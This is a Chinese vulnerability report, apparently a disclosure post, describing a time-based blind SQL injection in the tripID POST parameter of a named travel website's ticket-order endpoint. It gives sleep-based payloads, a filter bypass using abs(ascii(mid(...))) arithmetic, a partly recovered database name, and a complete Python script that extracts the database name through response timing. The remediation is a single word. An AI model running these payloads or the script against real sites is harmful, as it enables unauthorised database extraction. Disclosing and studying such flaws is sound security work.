站点:https://www.hwtrip.com/


注入点:

URL:https://www.hwtrip.com/v3/trip/order/ticketfill

post:priceID%5b2399%5d=0&tripID=

参数:tripID=

延迟10s:

priceID[2399]=0&tripID=if(now()=sysdate(),sleep(10),0)#
 

2.png



网站上是存在过滤的,if(ascii(mid(version(),1,1)) = 53,sleep(5),0)# 返回服务器错误,

构造if(now()=sysdate(),sleep(abs(ascii(mid(lower(version()),1,1))-53)),0)#绕过

当version的第一位ascii减去52时:
 

1.1.png



当version的第一位ascii减去53时:
 

1.png



这样可以通过返回的延时来逐位确定

得到database():hwtrip**<还有几位没跑,如果不确定,可以使用如下脚本验证>
 

3.png

附上验证脚本:

#!/usr/bin/python #coding:utf_8 import httplib import time import urllib import sys import random headers = {"Content-type": "application/x-www-form-urlencoded", 'Accept-Language':'zh-CN,zh;q=0.8', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)', "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "close", "Cache-Control": "no-cache"} post_data = {"priceID[2399]":'0' } payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') base_url = "/v3/trip/order/ticketfill" user = '' def sql(): global post_data global user cookie = raw_input("pls input your cookie:") headers["Cookie"] = cookie for i in range(1,22): for payload in payloads: getuser = "if(now()=sysdate(),sleep(abs(ascii(mid(lower(database()),%d,1))-%d)),0)#" % (i,ord(payload)) post_data["tripID"] = getuser postdata = urllib.urlencode(post_data) conn = httplib.HTTPConnection('',80,timeout=60) conn.request('POST', base_url, postdata, headers) now_time = time.time() html_contet = conn.getresponse().read().decode('utf-8') # print html_contet if time.time() - now_time < 1: user += payload sys.stdout.write('\r[In Progress]' + user +'\n') sys.stdout.flush() break else: print 'WAITING...' + str(random.randint(1,100)) if __name__ == "__main__": sql() print '\n[Done]MySQL user is ' + user # print time.strftime('%H:%M:%S', time.localtime()) 解决方案: 过滤